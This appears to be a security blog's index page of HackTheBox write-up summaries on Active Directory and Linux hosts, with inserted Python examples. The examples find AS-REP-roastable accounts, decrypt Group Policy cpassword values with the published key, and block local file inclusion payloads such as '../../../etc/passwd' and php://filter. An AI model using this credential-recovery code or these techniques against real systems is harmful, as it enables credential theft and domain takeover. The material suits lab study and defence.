
Summary

Forest is a Windows Active Directory Domain Controller that allows limited anonymous access via SMB, RPC and LDAP. This access allowed enumeration of the domain and identified a service account that does not require Kerberos pre-authentication. With pre-authentication disabled, anyone on the network can send an AS-REQ for that account without proving knowledge of its password, and the KDC answers with an AS-REP whose encrypted portion is keyed from the account's password hash. That response can be cracked offline to recover the password, a technique known as AS-REP Roasting.

Privileges were escalated by using this account to grant itself DCSync rights, which its inherited group memberships allowed. DCSync emulates the legitimate behaviour of Domain Controllers replicating directory data to each other over the Directory Replication Service Remote Protocol (MS-DRSR): any principal holding the Replicating Directory Changes and Replicating Directory Changes All rights on the domain object can request the same replication and receive password hashes. Because MS-DRSR is a necessary function of Active Directory, it cannot be turned off or disabled; the practical defence is to audit which principals hold those rights and to alert on replication requests that do not originate from a Domain Controller. DCSync was leveraged to extract the Administrator account's hash and gain elevated privileges. …
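The enumeration step described above comes down to reading one bit of each account's userAccountControl attribute. The following is an added example, not code from the original write-up: it decodes that attribute for a set of constructed sample records (the account names are made up) and lists the enabled accounts a KDC would answer without pre-authentication. The flag values are the documented ADS_USER_FLAG bits, and the LDAP filter string is the server-side equivalent of the same check.

```python
"""Spot accounts that are AS-REP roastable from their userAccountControl value.

Added example, not from the original write-up. The account records below are
constructed sample data; the bit values are the documented userAccountControl flags.
"""
from typing import Dict, List

# userAccountControl flag bits (ADS_USER_FLAG enumeration).
ACCOUNTDISABLE = 0x00000002
NORMAL_ACCOUNT = 0x00000200
DONT_EXPIRE_PASSWORD = 0x00010000
DONT_REQ_PREAUTH = 0x00400000   # "Do not require Kerberos preauthentication"

FLAG_NAMES = {
    ACCOUNTDISABLE: "ACCOUNTDISABLE",
    NORMAL_ACCOUNT: "NORMAL_ACCOUNT",
    DONT_EXPIRE_PASSWORD: "DONT_EXPIRE_PASSWORD",
    DONT_REQ_PREAUTH: "DONT_REQ_PREAUTH",
}

# Server-side equivalent: 1.2.840.113556.1.4.803 is the LDAP bitwise-AND
# matching rule and 4194304 == 0x400000. Usable with ldapsearch against a DC
# that permits anonymous or low-privileged reads (assumption about the target).
LDAP_FILTER_NO_PREAUTH = (
    "(&(objectCategory=person)(objectClass=user)"
    "(userAccountControl:1.2.840.113556.1.4.803:=4194304))"
)

# Constructed records standing in for LDAP search results (names are made up).
SAMPLE_ACCOUNTS: List[Dict[str, object]] = [
    {"sAMAccountName": "Administrator",
     "userAccountControl": NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD},
    {"sAMAccountName": "svc-backup",
     "userAccountControl": NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD | DONT_REQ_PREAUTH},
    {"sAMAccountName": "old-svc",
     "userAccountControl": NORMAL_ACCOUNT | DONT_REQ_PREAUTH | ACCOUNTDISABLE},
    {"sAMAccountName": "jdoe",
     "userAccountControl": NORMAL_ACCOUNT},
]


def decode_uac(value: int) -> List[str]:
    """Return the names of the known flags set in a userAccountControl value."""
    return [name for bit, name in FLAG_NAMES.items() if value & bit]


def asrep_roastable(accounts: List[Dict[str, object]]) -> List[str]:
    """Enabled accounts with DONT_REQ_PREAUTH set.

    The KDC answers an AS-REQ for these users without a pre-authentication
    timestamp, so an unauthenticated client obtains an AS-REP whose encrypted
    part is keyed from the account password and can be cracked offline.
    Disabled accounts are skipped: the KDC answers them with KDC_ERR_CLIENT_REVOKED.
    """
    out = []
    for acct in accounts:
        uac = int(acct["userAccountControl"])
        if uac & DONT_REQ_PREAUTH and not uac & ACCOUNTDISABLE:
            out.append(str(acct["sAMAccountName"]))
    return out


if __name__ == "__main__":
    for name in asrep_roastable(SAMPLE_ACCOUNTS):
        print(name, decode_uac(int(SAMPLE_ACCOUNTS[1]["userAccountControl"])))
```

The disabled-account check matters in practice: tools that skip it produce candidates that only generate KDC errors, and the filter string can be pasted straight into an ldapsearch command to get the same list from a live directory.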


The ominous Offensive Security logo

Introduction

Many OSCP write-ups focus on discussing the time spent in the PWK course and labs. I spent a significant amount of time preparing for this course before enrolling and I was able to pass the exam with only 30 days of lab access. Feel free to skip past the following section and check out the 5 tips that prepared me the most for this course!

My OSCP Experience

I first heard about OSCP two years ago and knew it was something I wanted to achieve. There was something unique and fascinating about the format: a 24-hour exam. …



Summary

Sputnik is a browser extension which I designed to quickly and easily search IPs, Domains, File Hashes, and URLs using free Open Source Intelligence (OSINT) resources.

As an Incident Response Analyst, this tool has enabled streamlined pivoting on artifacts gathered during investigations. Being able to quickly gather OSINT helps provide context to an investigation and can help when developing a narrative for an incident.

I designed this with convenience and efficiency in mind. In order to use the extension, simply highlight the artifact you wish to search and right click to choose an OSINT tool. You can also right click on hyperlinks, images, audio, and video content and the domain will be extracted from these artifacts. In most cases, you will be redirected straight to results. …



Summary

Active is a Windows Active Directory server with an SMB share, readable via anonymous logon, that contained a Groups.xml file. This Group Policy Preferences file held a cpassword value for a user account. Because Microsoft published the AES key that protects these values, the password was decrypted rather than cracked, which gave access to a service account with read access to the user flag.

Privileges were escalated by requesting Kerberos service tickets for accounts with registered Service Principal Names (Kerberoasting) and retrieving a ticket for the Administrator account, whose encrypted portion (the krb5tgs hash) was cracked offline. The recovered password granted read/write access to the filesystem as well as an interactive shell through arbitrary service installation and execution with tools such as psexec.
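The Groups.xml step above is mechanical enough to show end to end. The following is an added example, not code from the original write-up: it parses a constructed Groups.xml in the MS-GPPREF layout (the account name and the cpassword value are filler, not a real ciphertext), restores the base64 padding that Group Policy Preferences strips, and decrypts with the AES key Microsoft published in MS-GPPREF section 2.2.1.1.4. Decryption uses the third-party `cryptography` package only if it is installed; parsing and padding work without it.

```python
"""Pull the Group Policy Preferences cpassword out of a Groups.xml and decrypt it.

Added example, not code from the original write-up. The XML below is a
constructed sample in the MS-GPPREF Groups.xml layout; its cpassword is filler,
not a real ciphertext. The AES key is the one Microsoft published in
MS-GPPREF 2.2.1.1.4, which is why every GPP cpassword is recoverable.
"""
import base64
import xml.etree.ElementTree as ET
from typing import List, Tuple

GPP_AES_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b"
)

# Constructed sample. Real files sit in SYSVOL under
# Policies\{GUID}\Machine\Preferences\Groups\Groups.xml (or the User branch).
SAMPLE_GROUPS_XML = """<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="svc_deploy" image="2"
        changed="2018-07-18 20:46:06" uid="{11111111-2222-3333-4444-555555555555}">
    <Properties action="U" newName="" fullName="" description=""
                cpassword="ABCDEFGHABCDEFGHABCDEFGHABCDEFGHABCDEFGHABCDEFGHABCDEFGHABCDEFGHABCDEFGHABCDEFGHIJKLMN"
                changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"
                userName="corp.local\\svc_deploy"/>
  </User>
</Groups>
"""


def extract_gpp_credentials(xml_text: str) -> List[Tuple[str, str]]:
    """Return (userName, cpassword) pairs for every Properties element carrying a cpassword."""
    root = ET.fromstring(xml_text)
    found = []
    for props in root.iter("Properties"):
        cpass = props.get("cpassword")
        if cpass:
            found.append((props.get("userName", ""), cpass))
    return found


def pad_cpassword(cpassword: str) -> str:
    """GPP writes base64 without '=' padding; restore it so the decoder accepts the value."""
    return cpassword + "=" * (-len(cpassword) % 4)


def decrypt_cpassword(cpassword: str) -> str:
    """AES-256-CBC with an all-zero IV and PKCS#7 padding; the plaintext is UTF-16LE.

    Needs the 'cryptography' package; the rest of this file runs without it.
    """
    try:
        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    except ImportError as exc:
        raise RuntimeError("install the 'cryptography' package to decrypt cpassword") from exc
    data = base64.b64decode(pad_cpassword(cpassword))
    decryptor = Cipher(algorithms.AES(GPP_AES_KEY), modes.CBC(b"\x00" * 16)).decryptor()
    plain = decryptor.update(data) + decryptor.finalize()
    plain = plain[: -plain[-1]]          # strip PKCS#7 padding
    return plain.decode("utf-16-le")


if __name__ == "__main__":
    for user, cpass in extract_gpp_credentials(SAMPLE_GROUPS_XML):
        print(user, pad_cpassword(cpass))
```

On a real engagement the same parser can be pointed at every Groups.xml, ScheduledTasks.xml, Services.xml and DataSources.xml found in SYSVOL, since all of them carry the cpassword attribute in the same form.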

Recon

I began recon on this host with an nmap scan checking Service Versions and running Default Scripts on the top 1000 most common…



Summary

Reel is a Windows host running an FTP service which allowed Anonymous access. This was leveraged to access files on the system in order to enumerate a user email and identify that the user was expecting to receive .rtf files via email. A malicious .rtf file exploiting CVE-2017-0199 was then generated and sent to the user via Reel’s SMTP server. This exploit granted user access to Reel. Encrypted user credentials were discovered in an .xml document and were deciphered to gain persistence via SSH.

Privileges were escalated on the host via artifacts of a BloodHound Active Directory audit discovered on the host. Active Directory configurations were leveraged using PowerView (now a part of PowerSploit) to gain access to another user account with read access to a file containing credentials to the Administrator Account. …



Summary

DevOops is a Linux host running a web service whose file upload is vulnerable to XML External Entity (XXE) processing. This was leveraged to read files on the system in order to enumerate users, read bash history, and retrieve SSH keys. A root shell was gained by finding a root SSH key referenced in a user's bash history.

Recon

I began recon on this host with an nmap scan checking Service Versions and running Default Scripts on the top 1000 most common ports:

nmap -sV -sC 10.10.10.91

This returned 2 services: SSH on port 22 and HTTP on port 5000. Next, I decided to enumerate the web service with gobuster to return additional web…



Summary

Sunday is a Linux host running an SSH server with weak user credentials. These were leveraged to gain access to the machine and recover a backup of the /etc/shadow file. The backup was used to crack the password hash of an account allowed to run wget with elevated privileges, which was leveraged both to exfiltrate the root flag and to gain a root shell on the system.

Recon

I began recon on this host with an nmap scan checking Service Versions and running Default Scripts on the top 1000 most common ports:

nmap -sV -sC 10.10.10.76

This did not return much to work with so I pivoted to UDP to see if there was something to be found there. …



Summary

Poison is a Linux host running a web server vulnerable to local file inclusion (LFI). This was leveraged to enumerate local users and recover a file containing an encoded credential, which together gave SSH access to the machine. Local enumeration found a VNC process running as root that only accepted local connections. Port forwarding combined with a VNC password file recovered from the host returned a terminal over VNC with root privileges.
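The local file inclusion above works because the server joins a user-supplied name onto its document root and includes whatever results. The following is an added example, not code from the original write-up: it puts the vulnerable resolution logic beside a hardened one, with traversal, absolute paths, null bytes and PHP stream wrappers (the `php://filter` trick used to read source as base64) all rejected. The web root and file names are assumptions, and paths are resolved purely as strings so nothing touches the real filesystem.

```python
"""Local file inclusion: the unsafe include pattern beside a hardened resolver.

Added example, not code from the original write-up; the web root and file
names are assumptions. Paths are resolved as strings only, so the checks are
deterministic and touch no real filesystem.
"""
import posixpath
from typing import Optional

WEB_ROOT = "/var/www/html"                     # assumed document root
ALLOWED_SUFFIXES = (".php", ".html", ".txt")   # what the application legitimately includes


def unsafe_include_path(page: str) -> str:
    """What a vulnerable include($_GET['file']) effectively does: trust the parameter.

    '../../../etc/passwd' walks out of the document root unchallenged.
    """
    return posixpath.normpath(posixpath.join(WEB_ROOT, page))


def safe_include_path(page: str) -> Optional[str]:
    """Return an absolute path under WEB_ROOT, or None if the request is rejected."""
    # Null bytes truncated C-level paths in old PHP (< 5.3.4), defeating suffix checks.
    if "\x00" in page:
        return None
    # Stream wrappers such as php://filter/convert.base64-encode/resource=...,
    # data:// or expect:// read source or run code; plain files never carry a scheme.
    lowered = page.lower()
    if "://" in lowered or lowered.startswith(("php:", "data:", "expect:", "phar:")):
        return None
    # Absolute paths are never a legitimate page name.
    if page.startswith("/"):
        return None
    # Resolve traversal, then insist the result is still inside the document root.
    candidate = posixpath.normpath(posixpath.join(WEB_ROOT, page))
    if posixpath.commonpath([WEB_ROOT, candidate]) != WEB_ROOT:
        return None
    if not candidate.endswith(ALLOWED_SUFFIXES):
        return None
    return candidate


if __name__ == "__main__":
    for req in ("index.php", "../../../etc/passwd",
                "php://filter/convert.base64-encode/resource=index.php"):
        print(repr(req), "->", unsafe_include_path(req), "|", safe_include_path(req))
```

The ordering of checks is deliberate: normalising before the prefix comparison is what defeats `pages/../../etc/passwd`, and comparing with `commonpath` rather than `startswith` avoids treating `/var/www/html-backup` as inside `/var/www/html`.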

Recon

I began recon on this host with a scan to enumerate Service Versions and run Default Scripts on the 1000 most common ports that nmap checks by default:

nmap -sV -sC 10.10.10.84 …


the struggle is real

As excited as I initially am whenever I catch a reverse shell with netcat, my enthusiasm quickly diminishes when I remember how terribly limited these shells tend to be. So I’ve decided to compile a list of helpful commands that make these shells much more usable. Hopefully after reading this, you will be able to navigate around your reverse shells as easily as an SSH connection.

1. Spawn TTY with Python

This is probably singlehandedly the biggest improvement you can make to your netcat shell.



Summary

Stratosphere is a Linux host running a web server vulnerable to CVE-2017-5638, a critical remote code execution vulnerability in Apache Struts 2, which was leveraged to gain code execution as a low-privileged user on the system. Local enumeration returned credentials for a local MySQL instance. That database contained credentials that were then used to SSH onto the machine as a user with sudo rights to run a single Python 2 script. Python 2’s input() built-in, which evaluates whatever it reads as an expression, and the interpreter’s module import behaviour were exploited to gain root privileges on the system.

Recon

I began recon on this host with a full port scan using nmap with a few arguments to improve the speed of this…

About

Mitch Moser

digital brain | analog heart
